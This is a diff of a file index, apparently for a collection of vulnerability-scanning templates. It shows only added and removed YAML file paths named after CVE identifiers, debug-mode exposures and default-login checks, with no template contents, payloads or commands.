./poc/cve/cve-2021-25111-5802.yaml @@ -40595,6 +40569,7 @@ ./poc/cve/cve-2021-25112-5804.yaml ./poc/cve/cve-2021-25112-5805.yaml ./poc/cve/cve-2021-25118(1).yaml +./poc/cve/cve-2021-25120(1).yaml ./poc/cve/cve-2021-25120-5806.yaml ./poc/cve/cve-2021-25281-5807.yaml ./poc/cve/cve-2021-25281-5808.yaml @@ -40646,6 +40621,7 @@ ./poc/cve/cve-2021-26085-5841.yaml ./poc/cve/cve-2021-26085-5842.yaml ./poc/cve/cve-2021-26085-5843.yaml +./poc/cve/cve-2021-26086-5844.yaml ./poc/cve/cve-2021-26086-5845.yaml ./poc/cve/cve-2021-26086-5846.yaml ./poc/cve/cve-2021-26086-5847.yaml @@ -40664,8 +40640,10 @@ ./poc/cve/cve-2021-26475-5860.yaml ./poc/cve/cve-2021-26475-5861.yaml ./poc/cve/cve-2021-26475-5862.yaml +./poc/cve/cve-2021-26475-5863.yaml ./poc/cve/cve-2021-26598-5864.yaml ./poc/cve/cve-2021-26598-5865.yaml +./poc/cve/cve-2021-26702(1).yaml ./poc/cve/cve-2021-26710-5866.yaml ./poc/cve/cve-2021-26710-5867.yaml ./poc/cve/cve-2021-26710-5868.yaml @@ -40698,7 +40676,6 @@ ./poc/cve/cve-2021-27132-5896.yaml ./poc/cve/cve-2021-27132-5897.yaml ./poc/cve/cve-2021-27132-5898.yaml -./poc/cve/cve-2021-27132.yaml ./poc/cve/cve-2021-27310-5899.yaml ./poc/cve/cve-2021-27310-5900.yaml ./poc/cve/cve-2021-27330-5901.yaml @@ -40735,6 +40712,7 @@ ./poc/cve/cve-2021-27905-5931.yaml ./poc/cve/cve-2021-27905-5932.yaml ./poc/cve/cve-2021-27905-5933.yaml +./poc/cve/cve-2021-27931-5934.yaml ./poc/cve/cve-2021-27931-5935.yaml ./poc/cve/cve-2021-28073-1.yaml ./poc/cve/cve-2021-28073-2.yaml @@ -40774,7 +40752,6 @@ ./poc/cve/cve-2021-28169-5961.yaml ./poc/cve/cve-2021-28169-5962.yaml ./poc/cve/cve-2021-28169-5963.yaml -./poc/cve/cve-2021-28377(1).yaml ./poc/cve/cve-2021-28377-5964.yaml ./poc/cve/cve-2021-28377-5965.yaml ./poc/cve/cve-2021-28377-5966.yaml @@ -40789,7 +40766,6 @@ ./poc/cve/cve-2021-28918-2.yaml ./poc/cve/cve-2021-28918-3.yaml ./poc/cve/cve-2021-28918-5974.yaml -./poc/cve/cve-2021-28918-5975.yaml ./poc/cve/cve-2021-28918-5976.yaml ./poc/cve/cve-2021-28937-5977.yaml ./poc/cve/cve-2021-28937-5978.yaml @@ -40828,7 +40804,6 @@ ./poc/cve/cve-2021-29484-6008.yaml ./poc/cve/cve-2021-29490-6009.yaml ./poc/cve/cve-2021-29490-6010.yaml -./poc/cve/cve-2021-29490-6011.yaml ./poc/cve/cve-2021-29622-6012.yaml ./poc/cve/cve-2021-29622-6013.yaml ./poc/cve/cve-2021-29622-6014.yaml @@ -40837,6 +40812,7 @@ ./poc/cve/cve-2021-29622-6017.yaml ./poc/cve/cve-2021-29622-6018.yaml ./poc/cve/cve-2021-29622-6019.yaml +./poc/cve/cve-2021-29622.yaml ./poc/cve/cve-2021-29625-6020.yaml ./poc/cve/cve-2021-29625-6021.yaml ./poc/cve/cve-2021-29625-6022.yaml @@ -40878,7 +40854,6 @@ ./poc/cve/cve-2021-30497-6059.yaml ./poc/cve/cve-2021-30497-6060.yaml ./poc/cve/cve-2021-30497-6061.yaml -./poc/cve/cve-2021-30497-6062.yaml ./poc/cve/cve-2021-30497-6063.yaml ./poc/cve/cve-2021-30497-6064.yaml ./poc/cve/cve-2021-31249-6065.yaml @@ -40886,6 +40861,7 @@ ./poc/cve/cve-2021-31249-6067.yaml ./poc/cve/cve-2021-31249-6068.yaml ./poc/cve/cve-2021-31249-6069.yaml +./poc/cve/cve-2021-31250-6070.yaml ./poc/cve/cve-2021-31250-6071.yaml ./poc/cve/cve-2021-31250-6072.yaml ./poc/cve/cve-2021-31250-6073.yaml @@ -40905,12 +40881,12 @@ ./poc/cve/cve-2021-31537-6087.yaml ./poc/cve/cve-2021-31537-6088.yaml ./poc/cve/cve-2021-31537-6089.yaml -./poc/cve/cve-2021-31537.yaml ./poc/cve/cve-2021-31581-6090.yaml ./poc/cve/cve-2021-31581-6091.yaml ./poc/cve/cve-2021-31581-6092.yaml ./poc/cve/cve-2021-31581-6093.yaml ./poc/cve/cve-2021-31581-6094.yaml +./poc/cve/cve-2021-31589-6095.yaml ./poc/cve/cve-2021-31589-6096.yaml ./poc/cve/cve-2021-31602-1.yaml ./poc/cve/cve-2021-31602-2.yaml @@ -40972,9 +40948,7 @@ ./poc/cve/cve-2021-32820-6152.yaml ./poc/cve/cve-2021-32853-6153.yaml ./poc/cve/cve-2021-32853-6154.yaml -./poc/cve/cve-2021-32853-6155.yaml ./poc/cve/cve-2021-3293-6156.yaml -./poc/cve/cve-2021-3293-6157.yaml ./poc/cve/cve-2021-3293-6158.yaml ./poc/cve/cve-2021-3297-6159.yaml ./poc/cve/cve-2021-3297-6160.yaml @@ -41056,6 +41030,7 @@ ./poc/cve/cve-2021-34621-6235.yaml ./poc/cve/cve-2021-34640-6236.yaml ./poc/cve/cve-2021-34640-6237.yaml +./poc/cve/cve-2021-34643-6238.yaml ./poc/cve/cve-2021-34643-6239.yaml ./poc/cve/cve-2021-34805-6240.yaml ./poc/cve/cve-2021-34805-6241.yaml @@ -41071,13 +41046,13 @@ ./poc/cve/cve-2021-35336-6249.yaml ./poc/cve/cve-2021-35464-6250.yaml ./poc/cve/cve-2021-35464-6251.yaml +./poc/cve/cve-2021-35464-6252.yaml ./poc/cve/cve-2021-35464-6253.yaml ./poc/cve/cve-2021-35464-6254.yaml ./poc/cve/cve-2021-35464-6255.yaml ./poc/cve/cve-2021-35587-6256.yaml ./poc/cve/cve-2021-35587-6257.yaml ./poc/cve/cve-2021-3577-6258.yaml -./poc/cve/cve-2021-3577-6259.yaml ./poc/cve/cve-2021-3577-6260.yaml ./poc/cve/cve-2021-3577-6261.yaml ./poc/cve/cve-2021-36260-6262.yaml @@ -41087,19 +41062,21 @@ ./poc/cve/cve-2021-36380-6265.yaml ./poc/cve/cve-2021-36380-6266.yaml ./poc/cve/cve-2021-36380-6267.yaml +./poc/cve/cve-2021-36450(1).yaml ./poc/cve/cve-2021-3654-6268.yaml ./poc/cve/cve-2021-3654-6269.yaml ./poc/cve/cve-2021-3654-6270.yaml ./poc/cve/cve-2021-3654-6271.yaml ./poc/cve/cve-2021-3654-6272.yaml ./poc/cve/cve-2021-36748-6273.yaml +./poc/cve/cve-2021-36748-6274.yaml ./poc/cve/cve-2021-36748-6275.yaml ./poc/cve/cve-2021-36749-6276.yaml ./poc/cve/cve-2021-36749-6277.yaml +./poc/cve/cve-2021-36749-6278.yaml ./poc/cve/cve-2021-36749-6279.yaml ./poc/cve/cve-2021-37216-6281.yaml ./poc/cve/cve-2021-37216-6282.yaml -./poc/cve/cve-2021-37416(1).yaml ./poc/cve/cve-2021-37538-6283.yaml ./poc/cve/cve-2021-37538-6284.yaml ./poc/cve/cve-2021-37538-6285.yaml @@ -41109,6 +41086,7 @@ ./poc/cve/cve-2021-37573-6289.yaml ./poc/cve/cve-2021-37573-6290.yaml ./poc/cve/cve-2021-37580-6291.yaml +./poc/cve/cve-2021-37580-6292.yaml ./poc/cve/cve-2021-37589(1).yaml ./poc/cve/cve-2021-37704-2.yaml ./poc/cve/cve-2021-37704-6293.yaml @@ -41118,6 +41096,7 @@ ./poc/cve/cve-2021-37833-3.yaml ./poc/cve/cve-2021-37833-4.yaml ./poc/cve/cve-2021-37833-6296.yaml +./poc/cve/cve-2021-37833-6297.yaml ./poc/cve/cve-2021-37859(1).yaml ./poc/cve/cve-2021-38314-1.yaml ./poc/cve/cve-2021-38314-2.yaml @@ -41142,12 +41121,12 @@ ./poc/cve/cve-2021-38704-6316.yaml ./poc/cve/cve-2021-38704-6318.yaml ./poc/cve/cve-2021-38751-6319.yaml +./poc/cve/cve-2021-38751-6320.yaml ./poc/cve/cve-2021-38751-6321.yaml ./poc/cve/cve-2021-38751-6322.yaml ./poc/cve/cve-2021-39226-6324.yaml ./poc/cve/cve-2021-39226-6325.yaml ./poc/cve/cve-2021-39226-6326.yaml -./poc/cve/cve-2021-39312(1).yaml ./poc/cve/cve-2021-39312-6327.yaml ./poc/cve/cve-2021-39316-6328.yaml ./poc/cve/cve-2021-39316-6329.yaml @@ -41157,13 +41136,13 @@ ./poc/cve/cve-2021-39320-6333.yaml ./poc/cve/cve-2021-39320-6334.yaml ./poc/cve/cve-2021-39320-6335.yaml -./poc/cve/cve-2021-39320-6336.yaml ./poc/cve/cve-2021-39322-6337.yaml ./poc/cve/cve-2021-39322-6338.yaml ./poc/cve/cve-2021-39322-6339.yaml ./poc/cve/cve-2021-39327-1.yaml ./poc/cve/cve-2021-39327-2.yaml ./poc/cve/cve-2021-39327-6340.yaml +./poc/cve/cve-2021-39327-6341.yaml ./poc/cve/cve-2021-39327-6342.yaml ./poc/cve/cve-2021-39350-6343.yaml ./poc/cve/cve-2021-39350-6344.yaml @@ -41178,6 +41157,7 @@ ./poc/cve/cve-2021-39501-6353.yaml ./poc/cve/cve-2021-40149-6354.yaml ./poc/cve/cve-2021-40149-6355.yaml +./poc/cve/cve-2021-40150(1).yaml ./poc/cve/cve-2021-40150-6356.yaml ./poc/cve/cve-2021-40323-6357.yaml ./poc/cve/cve-2021-40323-6358.yaml @@ -41197,6 +41177,7 @@ ./poc/cve/cve-2021-40539-6372.yaml ./poc/cve/cve-2021-40542-6373.yaml ./poc/cve/cve-2021-40542-6374.yaml +./poc/cve/cve-2021-40822(1).yaml ./poc/cve/cve-2021-40822-6376.yaml ./poc/cve/cve-2021-40856-6377.yaml ./poc/cve/cve-2021-40856-6378.yaml @@ -41289,6 +41270,7 @@ ./poc/cve/cve-2021-41773-6463.yaml ./poc/cve/cve-2021-41773-6464.yaml ./poc/cve/cve-2021-41773-6465.yaml +./poc/cve/cve-2021-41773-6466.yaml ./poc/cve/cve-2021-41773-6467.yaml ./poc/cve/cve-2021-41773-6468.yaml ./poc/cve/cve-2021-41826-6469.yaml @@ -41371,7 +41353,9 @@ ./poc/cve/cve-2021-43810-6540.yaml ./poc/cve/cve-2021-43810-6541.yaml ./poc/cve/cve-2021-43810-6542.yaml +./poc/cve/cve-2021-44077(1).yaml ./poc/cve/cve-2021-44077-6543.yaml +./poc/cve/cve-2021-44103(1).yaml ./poc/cve/cve-2021-44103-6544.yaml ./poc/cve/cve-2021-44228-6545.yaml ./poc/cve/cve-2021-44228-6546.yaml @@ -41418,7 +41402,6 @@ ./poc/cve/cve-2021-45967-6585.yaml ./poc/cve/cve-2021-45967-6586.yaml ./poc/cve/cve-2021-45968-6587.yaml -./poc/cve/cve-2021-45968-6588.yaml ./poc/cve/cve-2021-45968-6589.yaml ./poc/cve/cve-2021-46005-6590.yaml ./poc/cve/cve-2021-46005-6591.yaml @@ -41434,8 +41417,10 @@ ./poc/cve/cve-2021-46417(1).yaml ./poc/cve/cve-2021-46417-6602.yaml ./poc/cve/cve-2021-46422(1).yaml +./poc/cve/cve-2022-0140(1).yaml ./poc/cve/cve-2022-0140-6603.yaml ./poc/cve/cve-2022-0148-6604.yaml +./poc/cve/cve-2022-0148-6605.yaml ./poc/cve/cve-2022-0149-6606.yaml ./poc/cve/cve-2022-0149-6607.yaml ./poc/cve/cve-2022-0149-6608.yaml @@ -41443,7 +41428,6 @@ ./poc/cve/cve-2022-0165-6609.yaml ./poc/cve/cve-2022-0189-6610.yaml ./poc/cve/cve-2022-0189-6611.yaml -./poc/cve/cve-2022-0201(1).yaml ./poc/cve/cve-2022-0218-6612.yaml ./poc/cve/cve-2022-0218-6613.yaml ./poc/cve/cve-2022-0218-6614.yaml @@ -41453,7 +41437,6 @@ ./poc/cve/cve-2022-0281-6618.yaml ./poc/cve/cve-2022-0281-6619.yaml ./poc/cve/cve-2022-0281-6620.yaml -./poc/cve/cve-2022-0288(1).yaml ./poc/cve/cve-2022-0346-6621.yaml ./poc/cve/cve-2022-0346-6622.yaml ./poc/cve/cve-2022-0378-6623.yaml @@ -41470,6 +41453,7 @@ ./poc/cve/cve-2022-0482-6633.yaml ./poc/cve/cve-2022-0482-6634.yaml ./poc/cve/cve-2022-0540(1).yaml +./poc/cve/cve-2022-0543(1).yaml ./poc/cve/cve-2022-0543-6635.yaml ./poc/cve/cve-2022-0591-6636.yaml ./poc/cve/cve-2022-0591-6637.yaml @@ -41478,20 +41462,18 @@ ./poc/cve/cve-2022-0653-6639.yaml ./poc/cve/cve-2022-0653-6640.yaml ./poc/cve/cve-2022-0653-6641.yaml +./poc/cve/cve-2022-0656(1).yaml ./poc/cve/cve-2022-0656-6642.yaml +./poc/cve/cve-2022-0660(1).yaml ./poc/cve/cve-2022-0692-6643.yaml ./poc/cve/cve-2022-0692-6644.yaml ./poc/cve/cve-2022-0692-6645.yaml ./poc/cve/cve-2022-0692-6646.yaml -./poc/cve/cve-2022-0776(1).yaml ./poc/cve/cve-2022-0963(1).yaml ./poc/cve/cve-2022-0963.yaml -./poc/cve/cve-2022-0968(1).yaml -./poc/cve/cve-2022-1020(1).yaml ./poc/cve/cve-2022-1040-6647.yaml -./poc/cve/cve-2022-1119(1).yaml +./poc/cve/cve-2022-1054(1).yaml ./poc/cve/cve-2022-1119-6648.yaml -./poc/cve/cve-2022-1221(1).yaml ./poc/cve/cve-2022-1386(1).yaml ./poc/cve/cve-2022-1388-6649.yaml ./poc/cve/cve-2022-1388-6650.yaml @@ -41501,8 +41483,8 @@ ./poc/cve/cve-2022-1597(1).yaml ./poc/cve/cve-2022-1597-6652.yaml ./poc/cve/cve-2022-1598-6654.yaml -./poc/cve/cve-2022-1609(1).yaml ./poc/cve/cve-2022-1609-6655.yaml +./poc/cve/cve-2022-1713(1).yaml ./poc/cve/cve-2022-1713-6656.yaml ./poc/cve/cve-2022-1724(1).yaml ./poc/cve/cve-2022-1906(1).yaml @@ -41511,9 +41493,8 @@ ./poc/cve/cve-2022-21371-6658.yaml ./poc/cve/cve-2022-21371-6659.yaml ./poc/cve/cve-2022-21500-6660.yaml -./poc/cve/cve-2022-21705(1).yaml ./poc/cve/cve-2022-22536-6661.yaml -./poc/cve/cve-2022-2290(1).yaml +./poc/cve/cve-2022-22536-6662.yaml ./poc/cve/cve-2022-22947-6663.yaml ./poc/cve/cve-2022-22947-6664.yaml ./poc/cve/cve-2022-22947-6665.yaml @@ -41527,7 +41508,6 @@ ./poc/cve/cve-2022-22965-6674.yaml ./poc/cve/cve-2022-22965-6675.yaml ./poc/cve/cve-2022-22965-6676.yaml -./poc/cve/cve-2022-22972(1).yaml ./poc/cve/cve-2022-22972-6677.yaml ./poc/cve/cve-2022-23131-6678.yaml ./poc/cve/cve-2022-23131-6679.yaml @@ -41566,17 +41546,14 @@ ./poc/cve/cve-2022-24288-6711.yaml ./poc/cve/cve-2022-24288-6712.yaml ./poc/cve/cve-2022-24681(1).yaml -./poc/cve/cve-2022-24856(1).yaml ./poc/cve/cve-2022-24856-6713.yaml -./poc/cve/cve-2022-2486(1).yaml ./poc/cve/cve-2022-2487(1).yaml -./poc/cve/cve-2022-24899(1).yaml +./poc/cve/cve-2022-2488(1).yaml ./poc/cve/cve-2022-24900(1).yaml ./poc/cve/cve-2022-24900-6714.yaml ./poc/cve/cve-2022-24990-6715.yaml ./poc/cve/cve-2022-24990-6716.yaml ./poc/cve/cve-2022-25216-6717.yaml -./poc/cve/cve-2022-25216-6718.yaml ./poc/cve/cve-2022-25216-6719.yaml ./poc/cve/cve-2022-25216-6720.yaml ./poc/cve/cve-2022-25323-6721.yaml @@ -41586,67 +41563,73 @@ ./poc/cve/cve-2022-25369-6725.yaml ./poc/cve/cve-2022-25369-6726.yaml ./poc/cve/cve-2022-25369-6727.yaml -./poc/cve/cve-2022-26134(1).yaml +./poc/cve/cve-2022-26138(1).yaml ./poc/cve/cve-2022-26138-6728.yaml ./poc/cve/cve-2022-26148-6729.yaml +./poc/cve/cve-2022-26148-6730.yaml ./poc/cve/cve-2022-26148-6731.yaml ./poc/cve/cve-2022-26159-6732.yaml ./poc/cve/cve-2022-26159-6733.yaml ./poc/cve/cve-2022-26233-6734.yaml ./poc/cve/cve-2022-26233-6735.yaml ./poc/cve/cve-2022-26233-6736.yaml +./poc/cve/cve-2022-26352(1).yaml ./poc/cve/cve-2022-26352-6737.yaml ./poc/cve/cve-2022-26352-6738.yaml ./poc/cve/cve-2022-26564(1).yaml ./poc/cve/cve-2022-26564-6739.yaml +./poc/cve/cve-2022-26960(1).yaml ./poc/cve/cve-2022-27849-6740.yaml ./poc/cve/cve-2022-27849-6741.yaml ./poc/cve/cve-2022-27927(1).yaml +./poc/cve/cve-2022-28079(1).yaml ./poc/cve/cve-2022-28079-6742.yaml +./poc/cve/cve-2022-28080(1).yaml ./poc/cve/cve-2022-28080-6743.yaml +./poc/cve/cve-2022-28219(1).yaml ./poc/cve/cve-2022-28363-6744.yaml ./poc/cve/cve-2022-28363-6745.yaml ./poc/cve/cve-2022-28365-6746.yaml ./poc/cve/cve-2022-28365-6747.yaml +./poc/cve/cve-2022-29014(1).yaml ./poc/cve/cve-2022-29014-6748.yaml ./poc/cve/cve-2022-29298-6749.yaml -./poc/cve/cve-2022-29301(1).yaml +./poc/cve/cve-2022-29299(1).yaml ./poc/cve/cve-2022-29303-6750.yaml ./poc/cve/cve-2022-29303-6751.yaml ./poc/cve/cve-2022-29303-6752.yaml -./poc/cve/cve-2022-29383(1).yaml -./poc/cve/cve-2022-29464(1).yaml +./poc/cve/cve-2022-29455(1).yaml +./poc/cve/cve-2022-29455.yaml ./poc/cve/cve-2022-29464-6753.yaml ./poc/cve/cve-2022-29548-6754.yaml ./poc/cve/cve-2022-30489(1).yaml +./poc/cve/cve-2022-30525(1).yaml ./poc/cve/cve-2022-30525-6755.yaml +./poc/cve/cve-2022-30776(1).yaml +./poc/cve/cve-2022-30777(1).yaml ./poc/cve/cve-2022-31268(1).yaml ./poc/cve/cve-2022-31268-6756.yaml ./poc/cve/cve-2022-31268-6757.yaml ./poc/cve/cve-2022-31793(1).yaml -./poc/cve/cve-2022-32018(1).yaml -./poc/cve/cve-2022-32024(1).yaml -./poc/cve/cve-2022-32025(1).yaml +./poc/cve/cve-2022-32007(1).yaml +./poc/cve/cve-2022-32022(1).yaml +./poc/cve/cve-2022-32026(1).yaml ./poc/cve/cve-2022-32028(1).yaml -./poc/cve/cve-2022-32159(1).yaml ./poc/cve/cve-2022-32159.yaml ./poc/cve/cve-2022-32409-6758.yaml ./poc/cve/cve-2022-32444-6759.yaml ./poc/cve/cve-2022-32444-6760.yaml +./poc/cve/cve-2022-33119(1).yaml ./poc/cve/cve-2022-33174(1).yaml ./poc/cve/cve-2022-33174-6761.yaml -./poc/cve/cve-2022-34046(1).yaml ./poc/cve/cve-2022-34046-6762.yaml ./poc/cve/cve-2022-34047-6763.yaml -./poc/cve/cve-2022-34049(1).yaml -./poc/cve/cve-2022-35416(1).yaml +./poc/cve/cve-2022-34048(1).yaml ./poc/cve/cve-2022-36883(1).yaml ./poc/cve/cve-2022-40684(1).yaml -./poc/cve/cve-2022-42889.yaml -./poc/cve/cve-2023-2523.yaml ./poc/cve/cve-2023-33246.yaml ./poc/cve/cve-2023-34039.yaml -./poc/cve/cve-2024-23897.yaml +./poc/cve/cve-2024-23334.yaml ./poc/cve/cve-annotate.yml ./poc/cve/cve2json.yml ./poc/cve/cve_rce2-1.yaml @@ -41759,9 +41742,8 @@ ./poc/cve/rails-cve-2018-3760-rce.yml ./poc/cve/razor-cve-2018-8770.yml ./poc/cve/rce-CVE-2021-21224.yaml -./poc/cve/rce-cve-2021-41773.yaml ./poc/cve/rconfig-cve-2019-16663.yml -./poc/cve/resin-cnnvd-200705-315-9866.yaml +./poc/cve/resin-cnnvd-200705-315-9865.yaml ./poc/cve/resin-cnnvd-200705-315-9867.yaml ./poc/cve/resin-cnnvd-200705-315.yaml ./poc/cve/resin-cnnvd-200705-315.yml @@ -41822,17 +41804,16 @@ ./poc/cve/zimbra-cve-2019-9670-xxe.yml ./poc/debug/Django-DebugMode.yaml ./poc/debug/TopApp-AD_enable_tool_debug_php-RCE.yaml -./poc/debug/airflow-debug-231.yaml ./poc/debug/airflow-debug-232.yaml +./poc/debug/airflow-debug-233.yaml ./poc/debug/airflow-debug.yaml ./poc/debug/ampache-debug-page.yaml ./poc/debug/android-debug-database-exposed-312.yaml ./poc/debug/android-debug-database-exposed-313.yaml -./poc/debug/android-debug-database-exposed-314.yaml ./poc/debug/android-debug-database-exposed-315.yaml +./poc/debug/android-debug-database-exposed-316.yaml ./poc/debug/android-debug-database-exposed.yaml ./poc/debug/android-manifest-debuggable-enabled.yaml -./poc/debug/aspx-debug-mode-575.yaml ./poc/debug/aspx-debug-mode-576.yaml ./poc/debug/aspx-debug-mode-577.yaml ./poc/debug/aspx-debug-mode-578.yaml @@ -41841,10 +41822,10 @@ ./poc/debug/browserless-debugger-795.yaml ./poc/debug/checkGoDebug.yaml ./poc/debug/coldfusion-debug-xss-1.yaml +./poc/debug/coldfusion-debug-xss-1152.yaml ./poc/debug/coldfusion-debug-xss-1153.yaml ./poc/debug/coldfusion-debug-xss-1154.yaml ./poc/debug/coldfusion-debug-xss-2.yaml -./poc/debug/coldfusion-debug-xss.yaml ./poc/debug/configure-service-timestamps-debug.yaml ./poc/debug/debug-3c7881aeda959430760389337ec81437.yaml ./poc/debug/debug-assistant-2f45650a91c72711c9ed905e46c42126.yaml @@ -41859,7 +41840,6 @@ ./poc/debug/debug-bar-elasticpress-plugin.yaml ./poc/debug/debug-bar-elasticpress.yaml ./poc/debug/debug-bar.yaml -./poc/debug/debug-enabled-6789.yaml ./poc/debug/debug-enabled-6790.yaml ./poc/debug/debug-enabled.yaml ./poc/debug/debug-functions-time-2df258451ffd3064fdb981dedfeff909.yaml @@ -41885,6 +41865,7 @@ ./poc/debug/debug_log.yaml ./poc/debug/django-debug-detect-7024.yaml ./poc/debug/django-debug-detect-7025.yaml +./poc/debug/django-debug-detect-7026.yaml ./poc/debug/django-debug-detect-7027.yaml ./poc/debug/django-debug-detect.yaml ./poc/debug/django-debug-enable.yaml @@ -41896,7 +41877,6 @@ ./poc/debug/django-debug-exposure.yaml ./poc/debug/django-debug-toolbar.yaml ./poc/debug/django-debug-v2.yaml -./poc/debug/django-debug.yaml ./poc/debug/django-debugmode-11848.yaml ./poc/debug/django-debugmode.yaml ./poc/debug/djangodebug.yaml @@ -41920,7 +41900,6 @@ ./poc/debug/laravel-debug-enabled-8575.yaml ./poc/debug/laravel-debug-enabled-8576.yaml ./poc/debug/laravel-debug-enabled-8577.yaml -./poc/debug/laravel-debug-enabled-8578.yaml ./poc/debug/laravel-debug-error-8579.yaml ./poc/debug/laravel-debug-error.yaml ./poc/debug/laravel-debug-info-leak.yaml @@ -41947,13 +41926,12 @@ ./poc/debug/sitecore-debug-page.yaml ./poc/debug/soap-ajax-debugshell.yaml ./poc/debug/struts-debug-mode-10559.yaml -./poc/debug/struts-debug-mode-10561.yaml +./poc/debug/struts-debug-mode-10560.yaml ./poc/debug/struts-debug-mode.yaml ./poc/debug/symfony-debug.yaml ./poc/debug/symfony-debugmode-10618.yaml ./poc/debug/symfony-debugmode-10619.yaml ./poc/debug/symfony-debugmode-10620.yaml -./poc/debug/symfony-debugmode-10621.yaml ./poc/debug/symfony-debugmode-10623.yaml ./poc/debug/symfony-debugmode.yaml ./poc/debug/thinkphp-debug-detected.yaml @@ -41972,7 +41950,7 @@ ./poc/debug/werkzeug-debugger-detect.yaml ./poc/debug/wordpress-debug-log-11256.yaml ./poc/debug/wordpress-debug-log-11257.yaml -./poc/debug/wordpress-debug-log-11258.yaml +./poc/debug/wordpress-debug-log-11259.yaml ./poc/debug/wordpress-debug-log.yaml ./poc/debug/wp-debug-log.yaml ./poc/debug/wp-debugging-0c12452c85fb9700ac837eef51c78541.yaml @@ -41985,7 +41963,6 @@ ./poc/debug/wp-debugging.yaml ./poc/debug/xdebug.yaml ./poc/debug/yii-debugger-1.yaml -./poc/debug/yii-debugger-11738.yaml ./poc/debug/yii-debugger-11739.yaml ./poc/debug/yii-debugger-11740.yaml ./poc/debug/yii-debugger-11741.yaml @@ -42002,9 +41979,8 @@ ./poc/default/MinIO-default-login.yaml ./poc/default/activemq-default-login-44.yaml ./poc/default/activemq-default-login-45.yaml -./poc/default/activemq-default-login-47.yaml +./poc/default/activemq-default-login-46.yaml ./poc/default/activemq-default-login-48.yaml -./poc/default/activemq-default-login.yaml ./poc/default/activemq-default-password.yaml ./poc/default/activemq-default-password.yml ./poc/default/adobe-aem-default-credentials-1.yaml @@ -42022,9 +41998,8 @@ ./poc/default/aem-default-get-servlet-11.yaml ./poc/default/aem-default-get-servlet-12.yaml ./poc/default/aem-default-get-servlet-13.yaml -./poc/default/aem-default-get-servlet-135.yaml +./poc/default/aem-default-get-servlet-136.yaml ./poc/default/aem-default-get-servlet-137.yaml -./poc/default/aem-default-get-servlet-138.yaml ./poc/default/aem-default-get-servlet-139.yaml ./poc/default/aem-default-get-servlet-14.yaml ./poc/default/aem-default-get-servlet-15.yaml @@ -42078,24 +42053,24 @@ ./poc/default/aem-default-get-servlet-8.yaml ./poc/default/aem-default-get-servlet-9.yaml ./poc/default/aem-default-get-servlet.yaml -./poc/default/aem-default-login-140.yaml ./poc/default/aem-default-login-141.yaml ./poc/default/aem-default-login-142.yaml +./poc/default/aem-default-login.yaml ./poc/default/airflow-default-credentials.yaml -./poc/default/airflow-default-login-234.yaml ./poc/default/airflow-default-login-235.yaml -./poc/default/airflow-default-login.yaml +./poc/default/airflow-default-login-236.yaml ./poc/default/alibaba-canal-default-password-262.yaml ./poc/default/alibaba-canal-default-password.yaml ./poc/default/alibaba-canal-default-password.yml +./poc/default/alphaweb-default-login-275.yaml ./poc/default/alphaweb-default-login-276.yaml -./poc/default/alphaweb-default-login-277.yaml ./poc/default/alphaweb-default-login.yaml ./poc/default/ambari-default-credentials-286.yaml ./poc/default/ambari-default-credentials.yaml ./poc/default/ambari-default-login-288.yaml ./poc/default/ambari-default-login-289.yaml ./poc/default/ambari-default-login-290.yaml +./poc/default/ambari-default-login.yaml ./poc/default/ambari-default-password.yaml ./poc/default/aolynk-br304-default-password.yaml ./poc/default/aolynk-br304-default-passwordl.yaml @@ -42103,9 +42078,10 @@ ./poc/default/apisix-default-login-490.yaml ./poc/default/apisix-default-login-492.yaml ./poc/default/apollo-default-login-520.yaml -./poc/default/arl-default-login-537.yaml +./poc/default/apollo-default-login-521.yaml ./poc/default/arl-default-login-538.yaml ./poc/default/arl-default-login-539.yaml +./poc/default/arl-default-login-540.yaml ./poc/default/arl-default-login.yaml ./poc/default/arl-default-password-542.yaml ./poc/default/arl-default-password.yaml @@ -42116,10 +42092,11 @@ ./poc/default/axis2-default-password-1.yaml ./poc/default/axis2-default-password-2.yaml ./poc/default/axis2-default-password.yaml -./poc/default/azkaban-default-login-671.yaml ./poc/default/azkaban-default-login-672.yaml ./poc/default/azkaban-default-login-673.yaml +./poc/default/azkaban-default-login-674.yaml ./poc/default/azkaban-default-login-675.yaml +./poc/default/azkaban-default-login.yaml ./poc/default/azkaban-default-password.yaml ./poc/default/azkaban-web-client-default-creds.yaml ./poc/default/azure-default-page.yaml @@ -42127,16 +42104,15 @@ ./poc/default/businessintelligence-default-login-814.yaml ./poc/default/businessintelligence-default-login-815.yaml ./poc/default/businessintelligence-default-login-816.yaml -./poc/default/businessintelligence-default-login.yaml ./poc/default/canal-default-login-847.yaml ./poc/default/canal-default-login-848.yaml ./poc/default/canal-default-login-849.yaml ./poc/default/canal-default-login.yaml ./poc/default/change-default-login-logo-url-and-title-fef61a56dbdca375b6c1f6da9b2473d7.yaml ./poc/default/change-default-login-logo-url-and-title.yaml -./poc/default/chinaunicom-default-login-906.yaml ./poc/default/chinaunicom-default-login-907.yaml ./poc/default/chinaunicom-default-login-908.yaml +./poc/default/chinaunicom-default-login-909.yaml ./poc/default/chinaunicom-modem-default-credentials-911.yaml ./poc/default/chinaunicom-modem-default-credentials.yaml ./poc/default/chinaunicom-modem-default-password.yaml @@ -42144,13 +42120,15 @@ ./poc/default/ciphertrust-default-password-vulnerability.yaml ./poc/default/circarlife-default-login.yaml ./poc/default/cnzxsoft-information-security-management-system-default-account.yaml -./poc/default/cobbler-default-login-1118.yaml +./poc/default/cobbler-default-login-1119.yaml ./poc/default/cobbler-default-login-1120.yaml ./poc/default/cobbler-default-login-1121.yaml +./poc/default/cobbler-default-login.yaml ./poc/default/control4-default-login.yaml ./poc/default/corero-cms-default-login.yaml ./poc/default/corero-swa-default-login.yaml ./poc/default/cs141-default-login-1.yaml +./poc/default/cs141-default-login-1277.yaml ./poc/default/cs141-default-login-1278.yaml ./poc/default/cs141-default-login-1279.yaml ./poc/default/cs141-default-login-1280.yaml @@ -42164,12 +42142,13 @@ ./poc/default/default-apache-test-all-6812.yaml ./poc/default/default-apache-test-all-6814.yaml ./poc/default/default-apache-test-all-6815.yaml -./poc/default/default-apache-test-page-6816.yaml +./poc/default/default-apache-test-all.yaml ./poc/default/default-apache-test-page-6817.yaml ./poc/default/default-apache-test-page-6818.yaml ./poc/default/default-apache-test-page-6819.yaml ./poc/default/default-apache2-page-6804.yaml ./poc/default/default-apache2-page-6805.yaml +./poc/default/default-apache2-page-6806.yaml ./poc/default/default-apache2-page-6807.yaml ./poc/default/default-apache2-ubuntu-page-6808.yaml ./poc/default/default-apache2-ubuntu-page-6809.yaml @@ -42180,10 +42159,8 @@ ./poc/default/default-asp-net-page-6822.yaml 